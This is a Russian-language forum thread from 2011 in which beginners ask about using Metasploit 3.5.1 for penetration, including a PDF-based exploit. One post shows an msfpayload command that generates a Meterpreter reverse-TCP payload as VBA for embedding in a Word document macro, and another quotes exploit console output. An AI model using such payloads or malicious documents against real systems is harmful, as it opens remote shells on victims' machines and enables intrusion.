PDA

Просмотр полной версии : Вопрос по Metasploit 3.5.1

Юдат
31.03.2011, 11:18
Доброго всем времени суток!

В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:

никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?

Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?

З.Ы. в манах ничего не нашел =(

И хотел бы уточнить, правильно ли я понимаю порядок действий?

1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий

2. находение сплоита отвечающего требованиям найденного, и конечной цели

3. использование сплоита с начинкой.

Зарание спасибо.

neofit
02.04.2011, 18:54
Юдат said:
В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:
никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?
1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий
Зарание спасибо.

Приветствую всё правелоно только целевая тачка должна быть с тобою в одной сети или прямой IP с обеех старон.

Ну и автоподбор эксплойта рекомендую fast-track.

dupD0M
05.04.2011, 00:49
ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))

????

neofit
05.04.2011, 06:06
dupD0M said:
ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))
????

С другом твоим в локалке)))

pahom
05.04.2011, 16:24
Здравствуйте. у меня такая проблемка

прописываю msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port V > test.bas

после это создаю вордовский документ .doc вставляю туда test.bas через visual basic и когда нажимаю сохранить выводит ошибку "сбой сохранения из-за недостатка памяти или места на диске"

места на диске 30 гб

подскажите в чем проблема?

спасибо.

Oro4imaru
15.04.2011, 10:01
после запуска сплоита получаю вот такой ответ

Started reverse double handler

Sending Backdoor Command

[-] Not backdoored

Exploit completed, but no session was created.

это значит что просто не удалось создать обратную связь (плохая начинка)? или что эксплойт не сработал?

ConnectOFF
01.05.2011, 08:23
Юдат said:
Зарание спасибо.

А не мог бы ты подробнее описать как и чем ты все это делаешь)) команды хочу узнать)

K800
15.05.2011, 06:31
ConnectOFF said:
А не мог бы ты подробнее описать как и чем ты все это делаешь)) команды хочу узнать)

/thread21599-Metasploit.html (https://antichat.live/threads/21599/)